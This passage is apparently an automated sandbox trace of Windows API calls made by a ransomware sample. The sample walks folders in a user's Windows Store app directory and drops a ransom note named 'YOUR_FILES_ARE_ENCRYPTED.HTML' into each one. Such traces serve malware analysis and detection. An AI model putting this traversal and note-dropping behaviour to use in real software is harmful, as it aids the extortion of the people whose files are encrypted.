[0120.706] CloseHandle (hObject=0x320) returned 1 [0120.706] GetProcessHeap () returned 0x600000 [0120.706] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.706] GetProcessHeap () returned 0x600000 [0120.706] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.708] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x93f064f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="Temp", cAlternateFileName="")) returned 0 [0120.708] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.708] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0120.708] GetProcessHeap () returned 0x600000 [0120.708] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.709] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.710] CloseHandle (hObject=0x324) returned 1 [0120.710] GetProcessHeap () returned 0x600000 [0120.710] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.710] GetProcessHeap () returned 0x600000 [0120.711] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.711] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x937de8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x937de8b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0120.711] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.711] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData") returned 93 [0120.711] GetProcessHeap () returned 0x600000 [0120.711] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.711] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData" [0120.711] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\*" [0120.732] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x937de8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x937de8b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.733] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x937de8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x937de8b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 1 [0120.733] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x937de8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x937de8b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 0 [0120.733] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.733] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0120.733] GetProcessHeap () returned 0x600000 [0120.733] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.733] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.734] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.735] CloseHandle (hObject=0x324) returned 1 [0120.735] GetProcessHeap () returned 0x600000 [0120.735] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.735] GetProcessHeap () returned 0x600000 [0120.735] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.735] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0120.735] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.735] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache") returned 96 [0120.735] GetProcessHeap () returned 0x600000 [0120.735] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.735] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache" [0120.735] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\*" [0120.735] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0120.736] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 1 [0120.736] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 0 [0120.736] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0120.736] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0120.736] GetProcessHeap () returned 0x600000 [0120.736] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.737] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.738] CloseHandle (hObject=0x324) returned 1 [0120.738] GetProcessHeap () returned 0x600000 [0120.738] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.738] GetProcessHeap () returned 0x600000 [0120.738] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.739] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0120.739] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.739] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState") returned 96 [0120.739] GetProcessHeap () returned 0x600000 [0120.739] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.740] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState" [0120.740] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\*" [0120.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.740] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 1 [0120.740] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 0 [0120.740] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.740] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0120.740] GetProcessHeap () returned 0x600000 [0120.740] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.741] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.743] CloseHandle (hObject=0x324) returned 1 [0120.743] GetProcessHeap () returned 0x600000 [0120.743] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.743] GetProcessHeap () returned 0x600000 [0120.743] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.743] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9783e1e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9783e1e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9783e1e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0120.743] StrStrIW (lpFirst="Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.743] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe") returned 140 [0120.743] GetProcessHeap () returned 0x600000 [0120.743] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.743] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe" [0120.743] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\*" [0120.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9783e1e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9783e1e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9783e1e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName=".", cAlternateFileName="")) returned 0x626878 [0120.743] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9783e1e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9783e1e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9783e1e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 1 [0120.743] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9783e1e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9783e1e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x97f6443, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0120.743] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.743] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 156 [0120.743] GetProcessHeap () returned 0x600000 [0120.743] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.744] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore" [0120.744] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0120.744] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9783e1e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9783e1e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x97f6443, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62f340, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.745] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9783e1e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9783e1e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x97f6443, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62f340, cFileName="..", cAlternateFileName="")) returned 1 [0120.745] FindNextFileW (in: hFindFile=0x6265b8, 